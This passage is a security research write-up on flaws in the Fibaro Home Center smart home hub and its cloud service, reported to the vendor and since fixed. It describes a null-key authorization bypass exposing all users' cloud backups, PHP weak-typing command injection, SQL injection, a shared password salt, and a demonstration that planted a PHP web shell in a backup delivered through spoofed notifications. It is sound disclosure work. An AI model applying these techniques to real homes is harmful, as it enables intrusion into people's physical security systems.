The fact that the admin panel operates through an API written in PHP encouraged us to continue this line of enquiry. To investigate the admin panel for vulnerabilities using white-box testing at this stage, we had to get the admin panel source code and the firmware of the smart home itself. This would provide a clearer understanding of its architecture and the structure of the logical processes inside it, such as scanning and downloading/installing updates.

Attack via the cloud

This type of attack can be carried out in two ways:

  1. By attempting to gain access to a device via the cloud having already access to similar Fibaro device,
  2. By attempting to gain access to the cloud, without access to any Fibaro device.

This vector implies testing the software logic, which is often located on the vendor’s servers. As we found out at the reconnaissance stage, Home Center can be managed through home.fibaro.com, a mobile app, or SMS. Even if you do not have a static IP address, your device will be accessible from the Internet. This means that the device connects to a server (most likely the vendor’s), which can allow the attacker to gain access to another smart home through the vendor’s common network.

The differences between (a) and (b) will become apparent when we examine the device architecture in more detail.  At this stage, suffice it to know that we need to somehow collect data about what common functionality the devices have in terms of the cloud.

File system image analysis

Let’s skip the description of how we found the image of the file system for the required device (we describe different ways of getting device firmware with examples as part of our IoT/embedded device vulnerability search training).

Our examination of the file system turned up some interesting facts.

Web API

The web server has a fully documented API that describes methods, parameter names, and the values they can take in a request. However, it turned out that to get any significant information, it was necessary to log into the admin panel.

The only information that can be obtained without authorization is the device serial number.

Access to the documented API through the web interface

Also, it can be seen in the nginx web server configuration file that some requests are proxied to a local server written in C++, and some are proxied to lighttpd, which executes code in PHP using mod_cgi. These PHP request handlers are called “services”

Simplified nginx server configuration

Services

As already stated, the majority of API requests are handled by a C++ binary server. However, for unexplained reasons, the developers singled out part of the logic (rebooting the device, restoring factory settings, creating a backup copy, and much more) and wrote it in PHP.

The web server written in C++ accepts all requests from nginx, and we have no direct access to it. This significantly narrows the attack surface for this web server – we have no option to send a randomly generated HTTP request to it.

Therefore, the part of the logic written in PHP is of great interest to us, since it is just about the only entry point for a possible attack.

Serial number and hardware key

Each device has a serial number and a hardware key, which are used to authorize it in the cloud. Each time a device wants to perform an action that is somehow connected to the cloud (for example, send an SMS or email to the device owner, upload a backup copy to the cloud, download a backup copy), the device sends an HTTP request to the server with the serial number and hardware key as parameters. These are checked in the cloud for compliance in the database. If authorization is successful, the action is executed.

As we already know, the serial number is not secret: It is fairly easy to get by means of an API request. Moreover, the number is not long. The serial numbers we encountered correspond to the regular expression (HCL|HC2)-(\d{6}), which is a small enough space to brute-force.

The hardware key, meanwhile, is secret and individual for each device; it is stored in a special section of the file system that is mounted during device bootup.

However, only the device serial number is used for scanning and checking for updates. This makes it quite straightforward to download any update from the cloud by serial number.

Threat of hardware key theft

A device that stores personal user data must be made as secure as possible against intrusion. To increase the level of protection, device developers sometimes deprive the owner of superuser rights in the system. In this case, the owner becomes an ordinary, non-privileged user able to perform only actions allowed by the developers. Sometimes, however, this approach does not work, because if the owner wants to tweak or fix something in the device (for example, a vulnerability in the phone’s code), they will not be able to do it independently. They will need assistance from the device developers, who can release an update with a fix, but not as quickly as one would like. Therefore, an alternative approach involves developers giving owners superuser rights, together with the responsibility for their use.

Both approaches have their strengths and weaknesses, and the question of which is better is a good topic for debate, but not today.

Fibaro’s developers decided not to give Home Center owners superuser rights and extra responsibility. Therefore, we viewed options to elevate privileges in the system from the admin panel as full-fledged vulnerabilities.

In the threat model we built for Fibaro Home Center, the priority is to protect the hardware key. The device has a function for sending notifications to the smart home owner in the event that their participation is needed to resolve issues reported by smart home equipment. Any hardware key owner can send messages, and the list of recipients who the owner of a particular hardware key can contact is not controlled in any way.

Messages from the cloud come from the address SERIAL_NUMBER@fibaro.com, where SERIAL_NUMBER is the serial number of the owner’s device. It can be assumed that not all device owners remember their Home Center serial number, and are not vigilant enough to check it. They are likely not to notice the substitution of the serial number in the sender’s address; the fact that the message was sent from the @fibaro.com server will be enough. And they will perform the actions recommended in the message.

Since the problem of extracting the hardware key from the device’s persistent memory is in most cases a question of time, it might be an idea for developers to change the mechanism for sending messages and SMS.

Scenes

In the Fibaro Home Center admin panel, it is possible to create “scenes” – behavior scenarios composed of blocks or scripts written in the Lua programming language that are executed under specified conditions.

Lua provides the option to create an isolated environment in which the programmer can execute arbitrary scripts in Lua without going beyond it. The language is also known for having various vulnerabilities that make it possible to escape from this isolated environment. A good example is a recently discovered vulnerability in Lua 5.0.3 in the bytecode verifier module, which formed the basis of a CTF challenge. In the description, the author states that the vulnerability was originally exploited on a “VPN SSL device” that that they were investigating as part of their work.

Unfortunately, we were out of luck: On the device that we examined, a newer version (5.2) of the Lua interpreter without the bytecode verifier module was installed, and none of the known simple methods of escaping from the Lua sandbox was available. In our case, the task of finding vulnerabilities in the isolated environment was reduced to searching for vulnerabilities directly in the Lua interpreter. This task is quite time-consuming, so we decided it would be irrational to pursue this vector.

Lua isolated environment

Plug-ins

Many plug-ins for Fibaro Home Center can be used to manage devices that may not belong to Fibaro. This feature adds a very interesting research vector: Can a cybercriminal with access to a device controlled by Home Center through plug-ins attack Home Center and gain access to it? Within the framework of this study, we decided to postpone work on this vector and focus instead on vulnerabilities more likely to bear fruit.

Cloud communication

To communicate with the cloud, the device performs several steps:

  • It gets the IP address and port to which it should connect,
  • It establishes an SSH connection with the server,
  • It forwards SSH port 22 to the specified port.

Thus, the Fibaro control center can connect to Home Center via a cloud server using a private SSH key to execute any command sent by the home owner, for example, by SMS or via the website.

Authentication nuances

An administrator password salt was not individually generated for each device, but strictly defined in the PHP code. If an attacker wanted to gain access to all Fibaro devices, their goal would be made a lot easier as a consequence. The cybercriminal could download all saved backup copies of all Fibaro smart home users, and then find identical hashes corresponding to identical passwords. The most common password matching the most frequently occurring hash could be brute-forced.

The scenario whereby an attacker builds rainbow tables for a given salt is possible in a targeted attack against all users of Fibaro systems. This is another argument in favor of generating an individual salt for each device.

Vulnerability scan

The first thing we looked at during our study was the part of the API implemented in PHP.

It would have been very interesting for us to test the methods that lay behind login, but without the ability to sign in, this research vector would not have yielded any results, since we could not call the methods we needed.

We investigated practically the only entry point available to us, and found nothing. It seemed that the study had reached a deadend, but then we decided to study the attack vector via the cloud.

Access to the cloud through which the smart home is managed (i.e. home.fibaro.com) was also unavailable to us, so we could only collect information about the cloud from scripts on the device that accessed it. As a rule, requests to the cloud were made from the device using the command-line tool cURL. Of all the requests, the most interesting were those for uploading backup copies to the cloud and downloading them from the cloud to the device.

AUTH BYPASS

After testing the cloud methods for processing requests from the device, we discovered a vulnerability linked to an authorization error allowing an intruder to list the backup copies of any user, upload backup copies to the cloud, and download them without having any rights in the system.

This problem occurred in the PHP code most likely as a result of incorrectly processing a scenario in which the passed value of the hardware key was set to null.

We rated this vulnerability as critical because it allowed access to all backup copies that were uploaded to the cloud from all Fibaro Home Centers. As will be shown later, using a backup copy and a remote code execution vulnerability in the admin panel, it is possible to gain full control over Home Center without interacting with the owner.

Remote code execution

Several remote code execution vulnerabilities were related to weak implicit typing in PHP. Let’s consider a simplified PHP code snippet in which we found a vulnerability:

Simplified PHP code snippet

On Fibaro devices, a significant part of device management is implemented using bash scripts, which in turn invoke command-line utilities for direct execution of required actions in the system. Some of these executable scripts are invoked directly from the PHP code using the exec command.  Since in the above snippet the user-controlled parameter is subsequently included in the command-line arguments, it needs to be filtered. If it is not possible to avoid executing bash scripts, the best solution is to not interpret this line in the bash shell and to run this command in an execve()-style way through the pcntl_exec function. However, due to the weak typing in PHP, and the fact that $_GET[‘parameter_name’] necessarily takes a string value, this parameter can be equal to 1234some_data_here_or_may_be_code_injection, in which case it will pass the if($parameter_value>0) check. Thus, the exploitation of this vulnerability made it possible to execute code remotely from the admin panel and gain root access on the device.

SQL injection

We also detected several problems associated with the injection of SQL code.

With the development of smart home software, the introduction of new components and dependencies is inevitable. Yet at the same time, they have to be accommodated in memory of very limited size. As a result, developers have to question the need for each new file in the system so as to avoid unnecessary future outlays on having a larger memory for each device. Therefore, developers of embedded devices often try to reduce, as far possible, the number of executable files and libraries that get installed onto the device. This is probably why Home Center did not have a library for interaction between SQLite and PHP, which could eliminate SQL injection by design errors with the help of prepared statements.

Simplified code sample containing an error

As can be seen in the screenshot, the system developers wanted to avoid SQL injections through the use of a very interesting filtration technique involving the duplication of quotes in the query, and a no less unusual method of accessing the database by running the sqlite3 tool from the command line. However, such filtering turned out to be insufficient because the quotes can still be escaped using a backslash in the first parameter. If such a backslash is inserted, it leads to a breakout from the string context in the second parameter and potential SQL injection in the database query.

In versions older than 4.540, all database queries were modified and securely rewritten using prepared statements.

The “Attack”

Using the vulnerability identified, we managed to retrieve a backup copy from our colleague’s device, in which only one file was of interest to us: the SQLite database file. A careful examination of this file showed it to contain a lot of valuable information:

  1. Our colleague’s password in cached form with an added salt
  2. The precise coordinates of the home where the device was located
  3. The geolocation of our colleague’s smartphone
  4. Our colleague’s email addresses used for registration in the Fibaro system
  5. All data about IoT devices (including ones not belonging to Fibaro) that were installed by our colleague at home, with device model, username/password in text form, IP addresses of devices in the internal network, etc.

Note that storing passwords for Fibaro Home Center-integrated IoT devices in text form allows an attacker with access to the Home Center and the SQLite database to gain access to all other devices in the home.

An offline attempt to brute-force our colleague’s password led nowhere, and none of the passwords for the other devices in the home worked for the Home Center control panel. However, we would have been very surprised if such a simple attack had produced a result. As a company, we regularly emphasize the need to use strong unique passwords for each device or service.

If we could have recovered the password from the hash using brute force, or if one of the passwords for the other devices had worked, we could have got inside the Home Center control panel. Then, to elevate privileges in the system, we would have needed to exploit the remote code execution vulnerability described above. To gain access to the device in this case, the owner’s participation would not have been required. But we had to take a different route.

We created a special backup copy in which we placed a password-protected PHP script that could execute any our command. After that, using the relevant cloud functionality, we sent an email and an SMS to our colleague for him to update the software on the device by downloading from the cloud the backup copy that we had prepared.

Our colleague knew straight away that these messages were sent by us. First, he had been expecting an “attack,” and second, our email did not match the standard format used by Fibaro. However, an ordinary user unaware that their smart home is being hacked might not spot the difference in format. As such, our colleague decided to continue the experiment and installed the backup copy.

The web server for executing PHP scripts was run on the device with superuser rights. So after the backup copy was installed by the device owner, we gained access to the smart home with maximum privileges.

Naturally, being decent and responsible people, we did not take any harmful actions in our colleague’s home – with the exception of changing the melody on his alarm clock to indicate our presence. The following morning, our colleague awoke to the soothing tones of drum & bass.

But unlike us, a real attacker with access to Home Center is unlikely to just fool around with the alarm clock. One of the main tasks of the device we investigated is to integrate all smart things so that the home owner could manage them from Home Center itself. A “smart thing” here can be not just a light bulb or kettle, but vital safety equipment: for example, alarms, window/door/gate opening and closing mechanisms, surveillance cameras, heating/air conditioning systems, etc. The havoc a villain could wreak in this situation is the stuff of horror movies, not this article.

Conclusion

In the course of this study, we were able to gain potential access through the cloud to all Fibaro Home Centers by uploading and downloading backup copies, as well as full root access to our colleague’s smart home.

We uncovered critical vulnerabilities on the device itself and in the cloud service. Our findings were reported to Fibaro Group, after which all the vulnerabilities were successfully eliminated.

We wish to thank Fibaro Group for this successful cooperation, and hope that we have helped to improve the security of their flagship product.

Currently, smart home nightmares are confined to horror movie screenplays, but they could soon become a terrifying reality if we do not take sufficient care over what we make and use.